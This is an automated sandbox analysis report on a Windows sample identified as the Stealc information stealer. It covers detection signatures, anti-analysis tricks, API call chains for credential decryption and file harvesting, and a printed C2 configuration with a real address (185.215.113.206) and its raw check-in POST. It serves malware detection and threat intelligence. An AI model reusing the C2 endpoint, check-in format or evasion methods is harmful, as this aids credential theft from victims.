Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1560648
MD5:e26b7b214a9bcdada5b6a91ced4f99b3
SHA1:092b5406ba5d33ebd2f40fb8ccbd9e191fb3a845
SHA256:0fcf04a856f1a43c977d633e19138fe8736482425557a16ea02e7572d2d6d313
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7044 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E26B7B214A9BCDADA5B6A91CED4F99B3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000002.00000002.1375818515.000000000179D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000002.00000003.1278149370.00000000055A0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 7044JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 7044JoeSecurity_StealcYara detected StealcJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-22T04:27:16.663705+010020442431Malware Command and Control Activity Detected192.168.2.749700185.215.113.20680TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: file.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://185.215.113.206/c4becf79229cb002.php/FAvira URL Cloud: Label: malware
              Found malware configuration
              Source: file.exe.7044.2.memstrminMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
              Multi AV Scanner detection for domain / URL
              Source: http://185.215.113.206/c4becf79229cb002.php/FVirustotal: Detection: 18%Perma Link
              Multi AV Scanner detection for submitted file
              Source: file.exeReversingLabs: Detection: 44%
              Source: file.exeVirustotal: Detection: 54%Perma Link
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: file.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C74C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,2_2_00C74C50
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C760D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,2_2_00C760D0
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C940B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,2_2_00C940B0
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C86960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,2_2_00C86960
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C7EA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,2_2_00C7EA30
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C79B80 CryptUnprotectData,LocalAlloc,LocalFree,2_2_00C79B80
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C86B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,2_2_00C86B79
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C79B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,2_2_00C79B20
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C77750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,2_2_00C77750
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C818A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,2_2_00C818A0
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C83910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,2_2_00C83910
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C81250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,2_2_00C81250
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C81269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,2_2_00C81269
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C8E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,2_2_00C8E210
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C8CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,2_2_00C8CBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C7DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,2_2_00C7DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C82390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,2_2_00C82390
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C7DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,2_2_00C7DB99
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C823A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,2_2_00C823A9
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C84B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,2_2_00C84B10
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C84B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,2_2_00C84B29
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C8DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,2_2_00C8DD30
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C8D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,2_2_00C8D530
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C716A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,2_2_00C716A0
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C716B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,2_2_00C716B9

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49700 -> 185.215.113.206:80
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: http://185.215.113.206/c4becf79229cb002.php
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAAAAFIIJDBGDGCGDAKHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 41 41 41 41 46 49 49 4a 44 42 47 44 47 43 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 43 43 43 39 38 37 30 36 37 37 46 32 31 34 38 37 37 32 38 38 37 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 41 41 41 46 49 49 4a 44 42 47 44 47 43 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 41 41 41 46 49 49 4a 44 42 47 44 47 43 47 44 41 4b 2d 2d 0d 0a Data Ascii: ------HDAAAAFIIJDBGDGCGDAKContent-Disposition: form-data; name="hwid"7CCC9870677F2148772887------HDAAAAFIIJDBGDGCGDAKContent-Disposition: form-data; name="build"mars------HDAAAAFIIJDBGDGCGDAK--
              Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
              Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C76C40 lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,lstrcpy,2_2_00C76C40
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: unknownHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAAAAFIIJDBGDGCGDAKHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 41 41 41 41 46 49 49 4a 44 42 47 44 47 43 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 43 43 43 39 38 37 30 36 37 37 46 32 31 34 38 37 37 32 38 38 37 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 41 41 41 46 49 49 4a 44 42 47 44 47 43 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 41 41 41 46 49 49 4a 44 42 47 44 47 43 47 44 41 4b 2d 2d 0d 0a Data Ascii: ------HDAAAAFIIJDBGDGCGDAKContent-Disposition: form-data; name="hwid"7CCC9870677F2148772887------HDAAAAFIIJDBGDGCGDAKContent-Disposition: form-data; name="build"mars------HDAAAAFIIJDBGDGCGDAK--
              Source: file.exe, 00000002.00000002.1375818515.000000000177E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
              Source: file.exe, 00000002.00000002.1375818515.00000000017DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
              Source: file.exe, 00000002.00000002.1375818515.00000000017DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/M
              Source: file.exe, 00000002.00000002.1375818515.00000000017DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
              Source: file.exe, 00000002.00000002.1375818515.00000000017DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/F
              Source: file.exe, 00000002.00000002.1375818515.00000000017DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php0
              Source: file.exe, 00000002.00000002.1375818515.00000000017C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php?
              Source: file.exe, 00000002.00000002.1375818515.00000000017DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpD
              Source: file.exe, 00000002.00000002.1375818515.00000000017DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpl
              Source: file.exe, 00000002.00000002.1375818515.000000000177E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.2062?
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C79770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop,2_2_00C79770

              System Summary

              barindex
              PE file contains section with special chars
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_010179662_2_01017966
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C948B02_2_00C948B0
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_010201912_2_01020191
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_010160792_2_01016079
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00FC59262_2_00FC5926
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00F262122_2_00F26212
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0101CA152_2_0101CA15
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00FC03952_2_00FC0395
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01021AB72_2_01021AB7
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_010194582_2_01019458
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00EE7EED2_2_00EE7EED
